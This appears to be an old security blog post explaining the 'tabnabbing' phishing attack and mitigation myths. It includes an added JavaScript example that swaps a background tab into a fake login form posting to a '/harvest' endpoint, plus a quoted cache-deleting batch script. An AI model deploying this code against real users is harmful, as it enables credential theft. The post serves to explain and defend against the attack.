Industry Watch
A new type of exploit.
All that's required is you surf to the wrong kind of (or infected) website to begin with.
The discovery was made by Aza Raskin, a project leader for Firefox. Raskin has a 'proof of concept' page online so you can test it yourself. The POC is not sophisticated, but actual attacks would be.
This is how it works.
- You surf to the 'wrong' type of site. This can also be an otherwise legitimate website (one running Microsoft IIS/ASP, for example) that's been compromised.
- You 'tab away' from your current tab and into a new one.
- After a predefined time interval (five seconds in the POC) the tab you just left magically changes into a page for one of your secure sites such as your bank's or Gmail or whatever. (The POC uses a screen dump mockup of Gmail.)
- The title in the old tab changes too but most likely you won't notice this. (But if you keep your eyes peeled when running the POC and count slowly to 'five' you'll see it.)
- The 'favicon' can change too, on several browser platforms.
- You'll appear (for example) to be logged out of your other site when you return to the tab.
- You reenter your login credentials and you're back in.
But the joke is you were never logged out in the first place. The second joke is the phishers now have your login credentials because you just gave them away.
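Here is the sequence above written out as code. This is an added example for this page, not the Raskin or Raff proof of concept: the function names, the example origins and the five second delay are all assumptions chosen for illustration. The timing logic is kept free of DOM calls so it can be exercised outside a browser; the swap itself (title, favicon, body) is wired up only when a `document` exists. The one thing the decoy cannot touch is the origin in the address bar, since no navigation takes place, and that is the check a user can always make before re-entering credentials.

```javascript
// Added example (not the original PoC). All names and values are assumptions.
const SWAP_DELAY_MS = 5000; // "count slowly to five"

// Pure timing state: can be driven from a test or from real visibility events.
function createTabnabState() {
  return { hidden: false, hiddenSince: null, swapped: false };
}

// Record the tab leaving (hidden === true) or regaining (hidden === false) the foreground.
function onVisibility(state, hidden, nowMs) {
  if (hidden && !state.hidden) {
    state.hidden = true;
    state.hiddenSince = nowMs;
  } else if (!hidden) {
    state.hidden = false;
    state.hiddenSince = null;
  }
  return state;
}

// Swap only once the user has been away long enough to forget what the tab held,
// and never more than once.
function shouldSwap(state, nowMs) {
  return state.hidden && !state.swapped && nowMs - state.hiddenSince >= SWAP_DELAY_MS;
}

// What the decoy changes (title, favicon, body) and what it cannot change:
// the origin shown in the address bar. The favicon is served from the attacker's own host.
function buildDecoy(originalHref, targetName) {
  return {
    title: `${targetName} - Sign in`,
    favicon: `/decoy/${targetName.toLowerCase()}.ico`, // assumed path on the attacker's site
    bodyHtml: `<h1>${targetName}</h1><p>Your session has expired. Please sign in again.</p>` +
      `<form method="post" action="/harvest">` + // assumed credential-collection endpoint
      `<input name="user"><input name="pass" type="password"><button>Sign in</button></form>`,
    addressBar: originalHref, // unchanged: no navigation has happened
  };
}

// The user-side check: the origin in the address bar must be the site you think you are
// logging in to. Any other origin behind a familiar login page is a decoy.
function isDecoy(expectedOrigin, addressBarHref) {
  return new URL(addressBarHref).origin !== expectedOrigin;
}

// Browser wiring; skipped under Node. Older implementations used window blur/focus
// instead of the Page Visibility API.
if (typeof document !== 'undefined') {
  const state = createTabnabState();
  const originalHref = location.href;
  let timer = null;
  const trySwap = () => {
    if (!shouldSwap(state, Date.now())) return;
    const decoy = buildDecoy(originalHref, 'ExampleMail');
    document.title = decoy.title;
    let link = document.querySelector('link[rel~="icon"]');
    if (!link) {
      link = document.createElement('link');
      link.rel = 'icon';
      document.head.appendChild(link);
    }
    link.href = decoy.favicon;
    document.body.innerHTML = decoy.bodyHtml;
    state.swapped = true;
  };
  document.addEventListener('visibilitychange', () => {
    onVisibility(state, document.hidden, Date.now());
    clearTimeout(timer);
    if (document.hidden) timer = setTimeout(trySwap, SWAP_DELAY_MS);
  });
}

if (typeof module !== 'undefined') {
  module.exports = { SWAP_DELAY_MS, createTabnabState, onVisibility, shouldSwap, buildDecoy, isDecoy };
}
```

Note that `isDecoy` compares origins, not full URLs: a page can rewrite its own path with the History API, but it cannot make the address bar show another site's scheme and host without actually navigating there.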
Aviv Raff has put together an even hastier POC showing the trick still works with various FF add-ons such as NoScript in place. At the present time some of these tricks aren't good enough to fool everyone, but given a little time they very well may be.
Mitigating this attack isn't easy. Avoiding sleazy sites is a start; avoiding sites that can easily be hacked (particularly Redmond's) can also be a help. And the good news is only about 30% of web servers run their software anyway.
Other things that cannot work (and will only lull you into a false sense of security):
√ Using a live CD. Live CDs are good and prevent you from being exploited by malware already resident on your computer. But this attack has nothing to do with your computer. It's based totally on what's found on a web page. If you surf to the wrong type of site, you're still going to be hit.
√ Running Windows/IE and cleaning caches. Unbelievably enough, a user claiming '14+' years' experience offered the following script as adequate protection for Windows XP systems.
@rem Close all open programs before running
@rem %username% - applies to currently logged in user, can be replaced with specific profile username
@rem Removes Adobe Flash Player cache and cookie directories
rmdir /S /Q "C:\Documents and Settings\%username%\Application Data\Adobe\Flash Player"
rmdir /S /Q "C:\Documents and Settings\%username%\Application Data\Macromedia"
@rem Clears User Profile 'Temp' folder files
del /F /Q "C:\Documents and Settings\%username%\Local Settings\Temp"
@rem Clears IE Temporary Internet Files, Cookies, History, Form Data, and Stored passwords
@rem (Applies only to IE7 and newer)
rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 255
@rem Prompts to press any key to continue (to see whether previous command finished before continuing)
pause
@rem Exits batch file
exit /b
See the links below for the proofs of concept. The second one by Aviv Raff will merely show how Firefox add-ons can be circumvented. Keep your eyes on the first one: surf to the link, open a new tab but keep an eye on the old one, and count slowly to five.
'It all starts with being disciplined in not only setting up multiple layers of defense (defense in depth) but also in operating the computers in a way to ensure they remain clean. I've been doing so for 14+ years.'
Aza on Design: A New Type of Phishing Attack
Aviv Raff: Devious New Phishing Attack Targets Tabs